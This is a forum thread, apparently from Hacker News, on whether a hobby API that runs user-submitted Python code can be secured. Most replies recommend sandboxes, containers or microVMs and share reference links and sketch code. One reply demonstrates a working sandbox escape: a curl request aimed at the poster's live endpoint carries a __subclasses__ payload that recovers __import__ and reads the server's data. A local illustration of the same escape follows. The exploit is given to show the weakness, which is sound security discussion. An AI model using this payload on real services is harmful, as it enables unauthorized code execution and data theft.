As a little weekend project, I'm trying to build an API to run Python code, and I'm wondering what might go wrong.<p>Specifically, is there any way of building such a service that is safe from being hacked? My guess is that letting users input code that will be run is never safe, but I'd love some input on this.<p>The API can be tested here: https://api-run-code.herokuapp.com/
... and here is the code: https://github.com/nathanganser/api-to-execute-python<p>For context, I'm thinking about building an app that needs to run user-inputted python code, and since I could not find a service that makes this easy, I just built an MVP of it.
You can use seccomp for this, which might allow you to build something very safe. PyPy also has a similar mechanism built in: <a href="https://doc.pypy.org/en/latest/sandbox.html" rel="nofollow">https://doc.pypy.org/en/latest/sandbox.html</a>. Or you can use virtual machines (you can build/find some that will boot in a few milliseconds).<p>edit: Your specific protection appears to be `__builtins__ = None`, with the code otherwise running in the same interpreter. It is very naive. Here is an example hack that gets to your "secret data":<p><pre><code> $ curl -H Content-Type:application/json -d '{"code": "res = [c for c in ().__class__.__base__.__subclasses__() if c.__name__ == \"catch_warnings\"][0]()._module.__builtins__[\"__import__\"](\"play\").data"}' https://api-run-code.herokuapp.com/execute
{"res":{"a":33}}
</code></pre>
(from <a href="https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html" rel="nofollow">https://nedbatchelder.com/blog/201206/eval_really_is_dangero...</a> but really you could have googled it)
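To see why `__builtins__ = None` does not help, here is a minimal local sketch of the same trick. It assumes the service does something like `exec(code, {"__builtins__": None})`; `HostSecret`, `run_untrusted` and `PAYLOAD` are names made up for this illustration and are not taken from the linked repo. The point is only that every class loaded in the interpreter stays reachable from a plain tuple literal, no builtins required.

```python
class HostSecret:
    """Hypothetical stand-in for host-side state the user code was never given."""
    data = {"a": 33}


# Walk from a tuple literal up to `object`, then down to every loaded class.
PAYLOAD = (
    "res = [c for c in ().__class__.__base__.__subclasses__() "
    "if c.__name__ == 'HostSecret'][0].data"
)


def run_untrusted(code):
    """Assumed shape of the naive protection: same interpreter, builtins removed."""
    scope = {"__builtins__": None}
    exec(code, scope)
    return scope.get("res")


leaked = run_untrusted(PAYLOAD)
print(leaked)
```

The curl example above goes one step further and uses a reachable class to get `__import__` back, at which point the user code can do anything the server process can.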
(Late to the party, but PyCoder's Weekly brought me here)<p>The method I use for my autograder research platform is:<p>1) Build a test suite as a JSON string that gets passed to a queue; on the student's side, they're given a job ID, and the page checks the job's status every few seconds<p>2) When it's their turn, I pass the submission to a Docker image<p>3) The Docker image dumps the student's code into a "submission.py" file and then dynamically builds the test cases based on what came in the JSON file (using Python's unittest library)<p>4) Save the code's test results to my DB and mark the job ID as "done"<p>5) Once the student's AJAX request sees a "done", it also returns the test results as a JSON string, which is then parsed and rendered on the screen<p>In terms of "safety", the big issue you'll need to test for is making sure that Docker does not have root access. Try to dig up some Docker vulnerabilities to poke holes in your system. You can also whitelist only a select number of libraries so users don't go importing things with vulnerabilities.
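A rough sketch of what the "dump to submission.py, build unittest cases from JSON" step could look like. This is not the platform's actual code: the JSON layout (`tests`, `function`, `args`, `expected`) and the helper names `load_submission`, `build_suite` and `run_job` are assumptions for illustration, and it is meant to run inside the container, never in the web process.

```python
import importlib.util
import json
import tempfile
import unittest
from pathlib import Path


def load_submission(source, workdir):
    """Write the student's code to submission.py and import it as a module."""
    path = Path(workdir) / "submission.py"
    path.write_text(source)
    spec = importlib.util.spec_from_file_location("submission", path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return module


def build_suite(cases, module):
    """Turn each JSON test case into a method on a fresh TestCase class."""
    class SubmissionTests(unittest.TestCase):
        pass

    for index, case in enumerate(cases):
        # Bind `case` as a default argument so each method keeps its own case.
        def test(self, case=case):
            func = getattr(module, case["function"])
            self.assertEqual(func(*case["args"]), case["expected"])

        setattr(SubmissionTests, f"test_{index}", test)

    return unittest.defaultTestLoader.loadTestsFromTestCase(SubmissionTests)


def run_job(spec_json, source):
    """Run one queued job and return the JSON string to store in the DB."""
    cases = json.loads(spec_json)["tests"]
    with tempfile.TemporaryDirectory() as workdir:
        module = load_submission(source, workdir)
        result = unittest.TestResult()
        build_suite(cases, module).run(result)
    failed = len(result.failures) + len(result.errors)
    return json.dumps({"status": "done", "ran": result.testsRun, "failed": failed})


spec_json = json.dumps({"tests": [
    {"function": "add", "args": [1, 2], "expected": 3},
    {"function": "add", "args": [2, 2], "expected": 5},  # deliberately wrong
]})
report = json.loads(run_job(spec_json, "def add(a, b):\n    return a + b\n"))
print(report)
```

The polling side then only has to read the stored JSON once the job's status is "done".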
Here are some references:<p><pre><code>- Giles Thomas - Lessons Learned from Serving 1/4 million in-browser Python Consoles with Tornado - EuroPython2013
  - Link: https://www.youtube.com/watch?v=U_qp8u_BH_E
  - Description: Giles is from PythonAnywhere, the author of [Interactive shells on Python.org](https://blog.pythonanywhere.com/83/) blog post.
  - PythonAnywhere uses:
    - SockJS:
      - Repo: https://github.com/sockjs
    - pty (Python built-in module) for handling pseudo-terminals (with pty.fork):
      - Docs: https://docs.python.org/3.7/library/pty.html
    - epoll (Tornado's IOLoop.add_handler for async):
      - Docs: https://www.tornadoweb.org/en/stable/
    - Xterm.js: Terminal on the browser at https://xtermjs.org/
- Jessica McKellar: Building and Breaking a Python Sandbox - Pycon 2014:
  - Link: https://www.youtube.com/watch?v=sL_syMmRkoU
  - pysandbox (author recommends running Python in a sandbox, not the opposite)
- Interactive Shells on Python.org:
  - Link: https://blog.pythonanywhere.com/83/
- CodeSandbox: Online web application editor (Angular, React, Vue, Vanilla JS)
  - Website: https://codesandbox.io/
  - Repo: https://github.com/codesandbox/codesandbox-client
- Kaggle:
  - Description: Kaggle's infrastructure and systems allow for arbitrary code execution and scoring. It would be good to check it out and see what they get right.
  - Kaggle Learntools:
    - Purpose: Check exercises and notebooks submitted by users
    - Link: https://github.com/Kaggle/learntools
  - Kaggle Docker:
    - Purpose: Kaggle Python docker image
    - Link: https://github.com/Kaggle/docker-python/
  - Kaggle Infrastructure (Lessons Learned from Tens of Thousands of Kaggle Notebooks):
    - Link: https://www.youtube.com/watch?v=ENPBTl0uNOE
- Miscellaneous Links:
  - Jinja has a sandboxed environment:
    - Link: https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py</code></pre>
Replit does this for their own services, and it seems like they might give you access to it, too[1].<p>That post is old and not very detailed, so maybe I'm misinterpreting it.<p>1. <a href="https://blog.replit.com/api-docs" rel="nofollow">https://blog.replit.com/api-docs</a>
You want to use some sort of sandbox or VM for this. Firecracker might fit your use case: <a href="https://firecracker-microvm.github.io/" rel="nofollow">https://firecracker-microvm.github.io/</a>
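A microVM setup does not fit in a few lines, but the step every sandbox shares, getting the user code out of the API's own interpreter, can be sketched with a child process. To be clear, this is not Firecracker and not a security boundary on its own: it only adds process separation, a CPU limit and a wall-clock timeout, and it assumes a POSIX host (the `resource` module and `preexec_fn` are Unix-only). `run_in_child` and its parameters are made-up names for the example.

```python
import resource
import subprocess
import sys


def run_in_child(code, cpu_seconds=1, wall_seconds=5):
    """Run `code` in a separate Python process with basic limits applied."""

    def limit_resources():
        # Runs in the child just before exec: cap the CPU time it may consume.
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds))

    try:
        proc = subprocess.run(
            [sys.executable, "-I", "-c", code],  # -I: isolated mode, ignores env vars and user site
            capture_output=True,
            text=True,
            timeout=wall_seconds,
            preexec_fn=limit_resources,
        )
    except subprocess.TimeoutExpired:
        return {"ok": False, "stdout": "", "error": "timeout"}
    return {"ok": proc.returncode == 0, "stdout": proc.stdout, "error": proc.stderr}


fast = run_in_child("print(1 + 1)")
stuck = run_in_child("while True: pass")
print(fast["stdout"], stuck["ok"])
```

The child still shares the host's filesystem and network, which is exactly the gap that seccomp, containers or a VM are there to close.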